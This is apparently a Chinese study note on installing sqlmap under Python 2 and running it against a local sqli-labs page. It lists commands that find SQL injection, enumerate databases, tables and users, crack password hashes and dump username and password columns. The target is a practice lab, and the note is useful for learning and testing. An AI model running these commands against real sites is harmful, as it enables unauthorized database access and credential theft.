SQLmap

本文为学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动

python2安装包:链接:https://pan.baidu.com/s/19jv1KZiBP8LiW3JbJKwo_w
提取码:ullc

Sqlmap安装包:链接:https://pan.baidu.com/s/1p533gyUcCIPvGuxnwJhAPA&shfl=sharepset
提取码:8ad4

简介:
一、安装python环境
二、解压SQLmap 并创建快捷方式
(注意:要解压sqlmap的时候,直接解压到python文件夹下)
三、SQLmap 爆出数据库

SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。
方法:打开sqlmap输入Python sqlmap.py -u +url
(本机SQLmap 是基于python2 环境运行,故调用python2. 请参照自己PC情况而定)

第一:python环境安装:
SQLmap是由python语言开发的工具,所以要先安装python环境
1、运行python的安装程序选中自主安装
点击打勾✔:Add PythonPATH (添加python的环境变量)
2、默认全选点击next进行安装
3、可自定义python的安装位置,点击install
4、安装完成,点击close关闭
确认安装:
打开cmd,输入python,能直接进入回显python版本信息说明安装成功
SQLmap_第1张图片

第二:下载好的SQLmap文件直接解压到python文件夹下
创建桌面快捷方式

SQLmap_第2张图片

1、桌面右键创建一个cmd快捷方式,并把快捷方式重新命名为SQLmap.exe
2、进入快捷方式的属性模块,把起始位置改为SQLmap的绝对路径
此时,SQLmap的快捷方式就创建好了
确认:打开快捷方式,输入 python sqlmap.py
页面显示:
SQLmap_第3张图片

第三:SQLmap 命令使用

1、指定目标注入地址)检测出存在可利用漏洞
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”

SQLmap_第4张图片
SQLmap_第5张图片
2、曝出所有数据库名称:–dbs:dbs前面有两条杠
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --dbs

SQLmap_第6张图片
3、web当前使用的数据库
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --current-db

SQLmap_第7张图片
4、列出当前数据库里所有的用户
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --users

SQLmap_第8张图片

5、列出当前数据库里的当前用户
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”–current-user

SQLmap_第9张图片
6、列出当前数据库里账户名,密码
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”–passwords

SQLmap_第10张图片

sqlmap已经做了MD5解密

SQLmap_第11张图片

7、列出数据库中的表参数:(-D:指定数据库名称 --tables:列出表)
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” -D security --tables

SQLmap_第12张图片

8、列出表中字段 (-D:指定数据库名称;-T:指定要列出字段的表;–columns:指定表的所有列 )
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”-D security -T users --columns

SQLmap_第13张图片
9、列出三个数据列中所有的数据: (-D dbname:指定数据库名称、-T tablename:指定某数据表名称、-C Cnmme:指定列名、–dump:导出列里面的字段)。
python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” -D security -T users -C id,username,password --dump

SQLmap_第14张图片

你可能感兴趣的:(工具)